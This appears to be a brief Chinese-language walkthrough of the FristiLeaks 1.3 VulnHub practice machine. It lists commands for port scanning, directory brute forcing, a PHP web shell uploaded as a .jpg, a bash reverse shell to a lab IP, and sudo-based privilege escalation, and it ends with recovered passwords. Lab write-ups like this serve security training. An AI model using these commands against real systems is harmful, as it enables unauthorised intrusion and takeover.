靶机链接：https://vulnhub.com/entry/fristileaks-13,133/

环境配置

初步打点

端口扫描

1
2

$ export rip=192.168.88.156
$ sudo nmap -v -A -p- $rip

$ cewl http://192.168.88.156/  >pass

$ dirb http://192.168.88.156/ pass

http://192.168.88.156/fristi/uploads/r444.php.jpg

1

/home/admin/../../bin/bash -i >& /dev/tcp/192.168.88.153/555 0>&1

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom touch /tmp/1
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash -p

import base64,codecs,sys

def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)
print(decodeString(sys.argv[1]))

LetThereBeFristi!
thisisalsopw123

最后修改于 2015-12-14